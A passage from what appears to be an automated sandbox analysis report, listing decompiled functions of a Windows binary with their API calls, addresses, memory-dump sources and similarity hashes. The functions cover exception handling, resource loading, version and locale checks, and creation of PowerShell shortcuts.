			}



                                                                                                                                                                                                                              0x01259bf3
                                                                                                                                                                                                                              0x01259bfc
                                                                                                                                                                                                                              0x01259c15

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,01259D22,01251024), ref: 01259BF3
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(01259D22,?,01259D22,01251024), ref: 01259BFC
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409,?,01259D22,01251024), ref: 01259C07
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,01259D22,01251024), ref: 01259C0E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                                                                                                              • Opcode ID: f9405b43ed201960364c9f97bec4db27cc2faaa36b6fb9718ad4b6d860c9445b
                                                                                                                                                                                                                              • Instruction ID: fe5f3c43a2b613ed7959bf385d609e45cc6148a932cabd28f55a1295e0aa692b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9405b43ed201960364c9f97bec4db27cc2faaa36b6fb9718ad4b6d860c9445b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7D0C932200584BBDF202BF1F90CA893F28EFC8212F048000FB19C60A5CA3264218B61
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125D547, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                              			E0125D547(struct HINSTANCE__* __ecx) {
				struct HRSRC__* _t1;
				struct HINSTANCE__* _t4;

				_t4 = __ecx;
				_t1 = FindResourceExW(__ecx, "MUI", 1, 0);
				if(_t1 != 0) {
					return LoadResource(_t4, _t1);
				} else {
					return _t1;
				}
			}





                                                                                                                                                                                                                              0x0125d54e
                                                                                                                                                                                                                              0x0125d556
                                                                                                                                                                                                                              0x0125d55e
                                                                                                                                                                                                                              0x0125d56b
                                                                                                                                                                                                                              0x0125d561
                                                                                                                                                                                                                              0x0125d561
                                                                                                                                                                                                                              0x0125d561

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,00000000,0125D603,00000000,00000000,0125D6B8,00000000,00000000,?,?,00000000,?), ref: 0125D556
                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0125D564
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Resource$FindLoad
                                                                                                                                                                                                                              • String ID: MUI
                                                                                                                                                                                                                              • API String ID: 2619053042-1339004836
                                                                                                                                                                                                                              • Opcode ID: 4bd29f7bb1dbd35ec4cb55ce869fdeed71f8bb746fa94edecfbcb003082fa70d
                                                                                                                                                                                                                              • Instruction ID: 4d742851aa2c1d7c52249ac0b62a9dd18f55a2102ce216f1df25928ac8094b3f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bd29f7bb1dbd35ec4cb55ce869fdeed71f8bb746fa94edecfbcb003082fa70d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7D01231345171B6EB71261A7C0DFD71A18DBC1BB5F018146FD05D6195DBA06D8282E4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125D220, Relevance: 4.6, APIs: 3, Instructions: 87COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                                                              			E0125D220() {
				signed int _v8;
				short _v16;
				struct _OSVERSIONINFOW _v292;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t23;
				void* _t25;
				intOrPtr _t26;
				void* _t29;
				void* _t30;
				void* _t34;
				void* _t37;
				void* _t38;
				int _t40;
				signed int _t42;

				_t16 =  *0x1260358; // 0xc21f7063
				_v8 = _t16 ^ _t42;
				_t40 =  *0x12608f4; // 0x0
				if(_t40 == 0) {
					memset( &_v292, _t40, 0x11c);
					_v292.dwOSVersionInfoSize = 0x11c;
					_t23 = GetVersionExW( &_v292);
					_t38 = _t38;
					if(_t23 == 0) {
						_v292.dwOSVersionInfoSize = 0x114;
						GetVersionExW( &_v292);
					}
					 *0x12608f4 = _t40;
					_t25 = _v292.dwPlatformId - 1;
					if(_t25 == 0) {
						L20:
						if(_v292.dwMajorVersion == 4) {
							_t26 = _v292.dwMinorVersion;
							if(_t26 == 0 || _t26 == 0xa || _t26 == 0x5a) {
								_t40 = 1;
								goto L25;
							}
						}
					} else {
						if(_t25 == 1) {
							if(_v292.dwMajorVersion != 5) {
								if(_v292.dwMajorVersion > 4) {
									_push(0x20);
									goto L17;
								} else {
									_t40 = 2;
									 *0x12608f4 = _t40;
									goto L20;
								}
							} else {
								_t29 = _v292.dwMinorVersion - _t40;
								if(_t29 == 0) {
									_push(4);
									goto L17;
								} else {
									_t30 = _t29 - 1;
									if(_t30 == 0) {
										if(_v16 >= 2) {
											_push(8);
											goto L14;
										}
										goto L15;
									} else {
										if(_t30 == 1) {
											if(_v16 >= 1) {
												_push(0x10);
												L14:
												_pop(_t40);
											}
											L15:
											_t40 = _t40 | 0x00000004;
										} else {
											_push(0x14);
											L17:
											_pop(_t40);
										}
									}
								}
								L25:
								 *0x12608f4 = _t40;
							}
						}
					}
				}
				return E01259A40(_t40, _t34, _v8 ^ _t42, _t37, _t38, _t40);
			}



















                                                                                                                                                                                                                              0x0125d22b
                                                                                                                                                                                                                              0x0125d232
                                                                                                                                                                                                                              0x0125d236
                                                                                                                                                                                                                              0x0125d23e
                                                                                                                                                                                                                              0x0125d253
                                                                                                                                                                                                                              0x0125d25b
                                                                                                                                                                                                                              0x0125d268
                                                                                                                                                                                                                              0x0125d26e
                                                                                                                                                                                                                              0x0125d271
                                                                                                                                                                                                                              0x0125d279
                                                                                                                                                                                                                              0x0125d284
                                                                                                                                                                                                                              0x0125d284
                                                                                                                                                                                                                              0x0125d290
                                                                                                                                                                                                                              0x0125d296
                                                                                                                                                                                                                              0x0125d299
                                                                                                                                                                                                                              0x0125d2f2
                                                                                                                                                                                                                              0x0125d2f9
                                                                                                                                                                                                                              0x0125d2fb
                                                                                                                                                                                                                              0x0125d303
                                                                                                                                                                                                                              0x0125d311
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d311
                                                                                                                                                                                                                              0x0125d303
                                                                                                                                                                                                                              0x0125d29b
                                                                                                                                                                                                                              0x0125d29e
                                                                                                                                                                                                                              0x0125d2a7
                                                                                                                                                                                                                              0x0125d2e7
                                                                                                                                                                                                                              0x0125d329
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d2e9
                                                                                                                                                                                                                              0x0125d2eb
                                                                                                                                                                                                                              0x0125d2ec
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d2ec
                                                                                                                                                                                                                              0x0125d2a9
                                                                                                                                                                                                                              0x0125d2af
                                                                                                                                                                                                                              0x0125d2b1
                                                                                                                                                                                                                              0x0125d2db
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d2b3
                                                                                                                                                                                                                              0x0125d2b3
                                                                                                                                                                                                                              0x0125d2b6
                                                                                                                                                                                                                              0x0125d2d1
                                                                                                                                                                                                                              0x0125d2d3
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d2d3
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d2b8
                                                                                                                                                                                                                              0x0125d2bb
                                                                                                                                                                                                                              0x0125d2c6
                                                                                                                                                                                                                              0x0125d2c8
                                                                                                                                                                                                                              0x0125d2d5
                                                                                                                                                                                                                              0x0125d2d5
                                                                                                                                                                                                                              0x0125d2d5
                                                                                                                                                                                                                              0x0125d2d6
                                                                                                                                                                                                                              0x0125d2d6
                                                                                                                                                                                                                              0x0125d2bd
                                                                                                                                                                                                                              0x0125d2bd
                                                                                                                                                                                                                              0x0125d2dd
                                                                                                                                                                                                                              0x0125d2dd
                                                                                                                                                                                                                              0x0125d2dd
                                                                                                                                                                                                                              0x0125d2bb
                                                                                                                                                                                                                              0x0125d2b6
                                                                                                                                                                                                                              0x0125d312
                                                                                                                                                                                                                              0x0125d312
                                                                                                                                                                                                                              0x0125d312
                                                                                                                                                                                                                              0x0125d2a7
                                                                                                                                                                                                                              0x0125d29e
                                                                                                                                                                                                                              0x0125d299
                                                                                                                                                                                                                              0x0125d328

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0125D253
                                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?,?,00000000), ref: 0125D268
                                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?,00000000), ref: 0125D284
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Version$memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3607446104-0
                                                                                                                                                                                                                              • Opcode ID: 62daaf4787997ed6d1aa850e17b7a84fb800dccebe6b5d0086e02332271df8e4
                                                                                                                                                                                                                              • Instruction ID: c1961fe3877945aeea4d6fe2391b587f3cd054791a9a776ca5768f13e5096bbe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62daaf4787997ed6d1aa850e17b7a84fb800dccebe6b5d0086e02332271df8e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C231F931D6022EA7DBB59F9C998ABE977B8A705760F044156DF04E2142C670CA818FD5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125D111, Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                              			E0125D111() {
				signed int _v8;
				long _v72;
				void* __esi;
				signed int _t5;
				signed int _t12;
				void* _t15;
				void* _t18;
				void* _t19;
				signed int _t21;

				_t5 =  *0x1260358; // 0xc21f7063
				_v8 = _t5 ^ _t21;
				_t20 = 0xc04;
				if(GetLocaleInfoW(0x404, 8,  &_v72, 0x20) != 0) {
					_t12 = wcsncmp( &_v72, 0x1253f1c, 3);
					asm("sbb eax, eax");
					_t20 = 0xc04 + ( ~_t12 & 0xfffff800);
				}
				return E01259A40(_t20, _t15, _v8 ^ _t21, _t18, _t19, _t20);
			}












                                                                                                                                                                                                                              0x0125d119
                                                                                                                                                                                                                              0x0125d120
                                                                                                                                                                                                                              0x0125d129
                                                                                                                                                                                                                              0x0125d13e
                                                                                                                                                                                                                              0x0125d14b
                                                                                                                                                                                                                              0x0125d155
                                                                                                                                                                                                                              0x0125d15c
                                                                                                                                                                                                                              0x0125d15c
                                                                                                                                                                                                                              0x0125d16f

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000404,00000008,?,00000020,00000000), ref: 0125D136
                                                                                                                                                                                                                              • wcsncmp.MSVCRT(?,01253F1C,00000003), ref: 0125D14B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocalewcsncmp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4128031126-0
                                                                                                                                                                                                                              • Opcode ID: 39cf62be32745f7081bd1c31d98342a5c10e4027066cf4d375121827a7f0e0a6
                                                                                                                                                                                                                              • Instruction ID: 719d270e98a0932d5a477beefcd50c001a034f49cfd066ee6f5719b87e5fcbe7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39cf62be32745f7081bd1c31d98342a5c10e4027066cf4d375121827a7f0e0a6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43F0E9B2E5020DA7EB50DA749C46F6E77EC9700714F400124AE04E72C1EA30AD05C695
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125BC92, Relevance: 49.4, APIs: 17, Strings: 11, Instructions: 390comregistryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 56%
                                                                                                                                                                                                                              			E0125BC92(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t100;
				void* _t101;
				void* _t105;
				void* _t110;
				void* _t112;
				void* _t113;
				void* _t115;
				void* _t119;
				void* _t120;
				void* _t127;
				void* _t130;
				void* _t131;
				void* _t143;
				void* _t151;
				void* _t154;
				void* _t156;
				void* _t164;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t176;
				char* _t177;
				char* _t178;
				void* _t191;
				void* _t193;
				intOrPtr* _t200;
				void* _t202;
				void* _t203;
				void* _t209;
				void* _t210;
				void* _t227;
				void* _t237;
				signed int _t253;
				void* _t270;
				void* _t271;

				_t179 = __ecx;
				_push(0x30);
				E0125A5F0(E0125A7F0, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t270 - 0x3c)) = __ecx;
				_t257 =  *(__edx + 0xc);
				_t176 = 0;
				 *(_t270 - 0x28) = 0;
				_t259 = 0;
				if( *(__edx + 0xc) == 0 || ( *(__edx + 0x2c) & 0x00000800) == 0) {
					 *(_t270 - 0x24) = _t176;
					_t100 = E0125C81E(_t179);
					_t177 = L"ConsoleHostShortcutTargetX86";
					if(_t100 == 0) {
						_t177 = L"ConsoleHostShortcutTarget";
					}
					_t101 = _t270 - 0x24;
					__imp__RegGetValueW(0x80000002, L"SOFTWARE\\Microsoft\\PowerShell\\3", _t177, 0x10000006, 0, 0, _t101);
					_t277 = _t101;
					if(_t101 != 0) {
						_t176 = 0;
						__eflags = 0;
						goto L20;
					} else {
						_t253 = 2;
						_t164 = E0125972E( ~(0 | _t277 > 0x00000000) | (( *(_t270 - 0x24) >> 0x00000001) + 0x00000001) * _t253);
						_t225 =  *(_t270 - 0x24) + 2;
						 *(_t270 - 0x28) = _t164;
						memset(_t164, 0,  *(_t270 - 0x24) + 2);
						_t271 = _t271 + 0x10;
						_t166 = _t270 - 0x24;
						__imp__RegGetValueW(0x80000002, L"SOFTWARE\\Microsoft\\PowerShell\\3", _t177, 0x10000006, 0,  *(_t270 - 0x28), _t166);
						if(_t166 != 0) {
							_t167 = E0125C81E(_t225);
							__eflags = _t167;
							if(_t167 == 0) {
								_t178 = L"%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\Windows PowerShell.lnk";
								_t168 = E0125C782(_t178);
								__eflags = _t168;
								if(_t168 != 0) {
									goto L15;
								} else {
									_t178 = L"%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Windows PowerShell.lnk";
									_t171 = E0125C782(_t178);
									__eflags = _t171;
									if(_t171 != 0) {
										goto L15;
									} else {
										_t178 = L"%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk";
										goto L14;
									}
								}
							} else {
								_t178 = L"%AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\Windows PowerShell(x86).lnk";
								_t173 = E0125C782(_t178);
								__eflags = _t173;
								if(_t173 != 0) {
									L15:
									_t257 = _t178;
									goto L16;
								} else {
									_t178 = L"%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell (x86).lnk";
									_t174 = E0125C782(_t178);
									__eflags = _t174;
									if(_t174 != 0) {
										goto L15;
									} else {
										_t178 = L"%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell (x86).lnk";
										L14:
										_t172 = E0125C782(_t178);
										__eflags = _t172;
										if(_t172 != 0) {
											goto L15;
										}
									}
								}
							}
						} else {
							_t257 =  *(_t270 - 0x28);
							L16:
							_t259 = 1;
						}
						_t176 = 0;
						_t227 = 0x6d;
						 *(_t270 - 0x14) = 0;
						if(E0125CDCC(_t227, _t270 - 0x14) >= 0) {
							SetConsoleTitleW( *(_t270 - 0x14));
							free( *(_t270 - 0x14));
							L20:
							E0125CE85(_t257, 0x7ffffffe, _t270 - 0x14);
							E0125CE50(0x12606e8,  *(_t270 - 0x14) + 1, _t257);
							if(_t259 == 0) {
								goto L21;
							}
							goto L22;
						}
					}
				} else {
					L21:
					E0125CE85(_t257, 0x7ffffffe, _t270 - 0x14);
					E0125CE50(0x12606e8,  *(_t270 - 0x14) + 1, _t257);
					L22:
					 *(_t270 - 0x34) = _t176;
					 *(_t270 - 4) = _t176;
					 *(_t270 - 0x2c) = _t176;
					_t105 = _t270 - 0x2c;
					 *(_t270 - 4) = 1;
					__imp__CoCreateInstance(0x12531b0, _t176, 1, 0x125334c, _t105);
					_t259 = _t105;
					if(_t105 >= 0) {
						_t110 =  *(_t270 - 0x2c);
						 *0x1261204(_t110, 0x12531e0, _t270 - 0x34);
						_t112 =  *( *_t110)();
						_t259 = _t112;
						if(_t112 >= 0) {
							_t113 =  *(_t270 - 0x34);
							_t237 = 2;
							 *0x1261204(_t113, 0x12606e8, _t237);
							_t115 =  *((intOrPtr*)( *((intOrPtr*)( *_t113 + 0x14))))();
							 *(_t270 - 0x38) = _t176;
							if(_t115 < 0) {
								E0125CE85(L"%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 0x7ffffffe, _t270 - 0x14);
								E0125CE50(0x12606e8,  *(_t270 - 0x14) + 1, L"%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe");
								goto L28;
							} else {
								_t154 =  *(_t270 - 0x2c);
								 *0x1261204(_t154, 0x12606e8, 0x104, _t270 - 0x38);
								_t156 =  *((intOrPtr*)( *_t154 + 0x40))();
								_t259 = _t156;
								if(_t156 >= 0) {
									L28:
									 *(_t270 - 0x20) = _t176;
									_t119 = 2;
									 *(_t270 - 4) = _t119;
									_t120 = _t270 - 0x20;
									__imp__CoCreateInstance(0x12531d0, _t176, 3, 0x125332c, _t120);
									_t259 = _t120;
									__eflags = _t259;
									if(_t259 >= 0) {
										 *(_t270 - 0x1c) = _t176;
										 *(_t270 - 4) = 3;
										_t191 = 0x76;
										 *(_t270 - 0x18) = _t176;
										 *(_t270 - 0x14) = _t176;
										_t259 = E0125CDCC(_t191, _t270 - 0x18);
										__eflags = _t259;
										if(_t259 >= 0) {
											_t193 = 0x77;
											E0125CDCC(_t193, _t270 - 0x14);
											_push(_t270 - 0x1c);
											_push(_t193);
											_push(1);
											_push( *(_t270 - 0x38));
											_push(0x12606e8);
											_push(_t193);
											_push(_t193);
											_t259 = E0125C2E3(_t176,  *(_t270 - 0x18), _t257, _t257, _t259, __eflags);
											free( *(_t270 - 0x28));
											free( *(_t270 - 0x18));
											free( *(_t270 - 0x14));
											__eflags = _t259;
											if(_t259 >= 0) {
												_t127 =  *(_t270 - 0x20);
												 *0x1261204(_t127,  *(_t270 - 0x1c));
												_t259 =  *((intOrPtr*)( *((intOrPtr*)( *_t127 + 0x14))))();
												__eflags = _t259;
												if(_t259 >= 0) {
													_t130 = E0125C197();
													__eflags = _t130;
													if(_t130 == 0) {
														L39:
														 *(_t270 - 0x30) = _t176;
														 *(_t270 - 4) = 4;
														_t131 =  *(_t270 - 0x20);
														 *0x1261204(_t131, 0x1253c18, _t270 - 0x30);
														_t259 =  *( *_t131)();
														__eflags = _t259;
														if(_t259 >= 0) {
															_t200 =  *((intOrPtr*)(_t270 - 0x3c));
															 *0x1261204(_t200,  *(_t270 - 0x30));
															_t259 =  *((intOrPtr*)( *((intOrPtr*)( *_t200 + 0x1c))))();
														}
														E01259691(_t270 - 0x30);
													} else {
														_t202 = 0x7a;
														_t259 = E0125CDCC(_t202, _t270 - 0x18);
														__eflags = _t259;
														if(_t259 >= 0) {
															_t203 = 0x7b;
															E0125CDCC(_t203, _t270 - 0x14);
															__imp__#30(_t270 - 0x1c, _t176);
															_t257 = L"%systemroot%\\system32\\windowspowershell\\v1.0\\powershell_ise.exe";
															_push(_t270 - 0x1c);
															_push(_t203);
															_push(1);
															_push(_t176);
															_push(_t257);
															_push(_t203);
															_push(_t203);
															_t259 = E0125C2E3(_t176,  *(_t270 - 0x18), _t257, _t257, _t259, __eflags);
															free( *(_t270 - 0x18));
															free( *(_t270 - 0x14));
															__eflags = _t259;
															if(_t259 >= 0) {
																_t143 =  *(_t270 - 0x20);
																 *0x1261204(_t143,  *(_t270 - 0x1c));
																_t259 =  *((intOrPtr*)( *((intOrPtr*)( *_t143 + 0x14))))();
																__eflags = _t259;
																if(_t259 >= 0) {
																	_t209 = 0x65;
																	_t259 = E0125CDCC(_t209, _t270 - 0x18);
																	__eflags = _t259;
																	if(_t259 >= 0) {
																		_t210 = 0x6f;
																		E0125CDCC(_t210, _t270 - 0x14);
																		__imp__#30(_t270 - 0x1c, _t176);
																		_push(_t270 - 0x1c);
																		_push(_t210);
																		_push(_t176);
																		_push(_t176);
																		_push(_t257);
																		_push(_t210);
																		_push(_t210);
																		_t259 = E0125C2E3(_t176,  *(_t270 - 0x18), _t257, _t257, _t259, __eflags);
																		free( *(_t270 - 0x18));
																		free( *(_t270 - 0x14));
																		__eflags = _t259;
																		if(_t259 >= 0) {
																			_t151 =  *(_t270 - 0x20);
																			 *0x1261204(_t151,  *(_t270 - 0x1c));
																			_t259 =  *((intOrPtr*)( *((intOrPtr*)( *_t151 + 0x14))))();
																			__eflags = _t259;
																			if(_t259 >= 0) {
																				goto L39;
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
										E01259691(_t270 - 0x1c);
									}
									E01259691(_t270 - 0x20);
								} else {
								}
							}
						}
					}
					E01259691(_t270 - 0x2c);
					E01259691(_t270 - 0x34);
				}
				return E0125A59F(_t176, _t257, _t259);
			}










































                                                                                                                                                                                                                              0x0125bc92
                                                                                                                                                                                                                              0x0125bc92
                                                                                                                                                                                                                              0x0125bc99
                                                                                                                                                                                                                              0x0125bc9e
                                                                                                                                                                                                                              0x0125bca1
                                                                                                                                                                                                                              0x0125bca4
                                                                                                                                                                                                                              0x0125bca6
                                                                                                                                                                                                                              0x0125bca9
                                                                                                                                                                                                                              0x0125bcad
                                                                                                                                                                                                                              0x0125bcbc
                                                                                                                                                                                                                              0x0125bcbf
                                                                                                                                                                                                                              0x0125bcc4
                                                                                                                                                                                                                              0x0125bccb
                                                                                                                                                                                                                              0x0125bccd
                                                                                                                                                                                                                              0x0125bccd
                                                                                                                                                                                                                              0x0125bcd2
                                                                                                                                                                                                                              0x0125bcea
                                                                                                                                                                                                                              0x0125bcf0
                                                                                                                                                                                                                              0x0125bcf2
                                                                                                                                                                                                                              0x0125bde1
                                                                                                                                                                                                                              0x0125bde1
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125bcf8
                                                                                                                                                                                                                              0x0125bd02
                                                                                                                                                                                                                              0x0125bd0d
                                                                                                                                                                                                                              0x0125bd15
                                                                                                                                                                                                                              0x0125bd18
                                                                                                                                                                                                                              0x0125bd1f
                                                                                                                                                                                                                              0x0125bd24
                                                                                                                                                                                                                              0x0125bd27
                                                                                                                                                                                                                              0x0125bd40
                                                                                                                                                                                                                              0x0125bd48
                                                                                                                                                                                                                              0x0125bd4f
                                                                                                                                                                                                                              0x0125bd54
                                                                                                                                                                                                                              0x0125bd56
                                                                                                                                                                                                                              0x0125bd7f
                                                                                                                                                                                                                              0x0125bd86
                                                                                                                                                                                                                              0x0125bd8b
                                                                                                                                                                                                                              0x0125bd8d
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125bd8f
                                                                                                                                                                                                                              0x0125bd8f
                                                                                                                                                                                                                              0x0125bd96
                                                                                                                                                                                                                              0x0125bd9b
                                                                                                                                                                                                                              0x0125bd9d
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125bd9f
                                                                                                                                                                                                                              0x0125bd9f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125bd9f
                                                                                                                                                                                                                              0x0125bd9d
                                                                                                                                                                                                                              0x0125bd58
                                                                                                                                                                                                                              0x0125bd58
                                                                                                                                                                                                                              0x0125bd5f
                                                                                                                                                                                                                              0x0125bd64
                                                                                                                                                                                                                              0x0125bd66
                                                                                                                                                                                                                              0x0125bdaf
                                                                                                                                                                                                                              0x0125bdaf
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125bd68
                                                                                                                                                                                                                              0x0125bd68
                                                                                                                                                                                                                              0x0125bd6f
                                                                                                                                                                                                                              0x0125bd74
                                                                                                                                                                                                                              0x0125bd76
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125bd78
                                                                                                                                                                                                                              0x0125bd78
                                                                                                                                                                                                                              0x0125bda4
                                                                                                                                                                                                                              0x0125bda6
                                                                                                                                                                                                                              0x0125bdab
                                                                                                                                                                                                                              0x0125bdad
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125bdad
                                                                                                                                                                                                                              0x0125bd76
                                                                                                                                                                                                                              0x0125bd66
                                                                                                                                                                                                                              0x0125bd4a
                                                                                                                                                                                                                              0x0125bd4a
                                                                                                                                                                                                                              0x0125bdb1
                                                                                                                                                                                                                              0x0125bdb3
                                                                                                                                                                                                                              0x0125bdb3
                                                                                                                                                                                                                              0x0125bdb6
                                                                                                                                                                                                                              0x0125bdbb
                                                                                                                                                                                                                              0x0125bdbc
                                                                                                                                                                                                                              0x0125bdc6
                                                                                                                                                                                                                              0x0125bdcf
                                                                                                                                                                                                                              0x0125bdd8
                                                                                                                                                                                                                              0x0125bde3
                                                                                                                                                                                                                              0x0125bdee
                                                                                                                                                                                                                              0x0125bdff
                                                                                                                                                                                                                              0x0125be06
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125be06
                                                                                                                                                                                                                              0x0125bdc6
                                                                                                                                                                                                                              0x0125be08
                                                                                                                                                                                                                              0x0125be08
                                                                                                                                                                                                                              0x0125be13
                                                                                                                                                                                                                              0x0125be24
                                                                                                                                                                                                                              0x0125be29
                                                                                                                                                                                                                              0x0125be29
                                                                                                                                                                                                                              0x0125be2c
                                                                                                                                                                                                                              0x0125be2f
                                                                                                                                                                                                                              0x0125be32
                                                                                                                                                                                                                              0x0125be35
                                                                                                                                                                                                                              0x0125be47
                                                                                                                                                                                                                              0x0125be4d
                                                                                                                                                                                                                              0x0125be51
                                                                                                                                                                                                                              0x0125be57
                                                                                                                                                                                                                              0x0125be68
                                                                                                                                                                                                                              0x0125be6e
                                                                                                                                                                                                                              0x0125be70
                                                                                                                                                                                                                              0x0125be74
                                                                                                                                                                                                                              0x0125be7a
                                                                                                                                                                                                                              0x0125be7f
                                                                                                                                                                                                                              0x0125be8e
                                                                                                                                                                                                                              0x0125be94
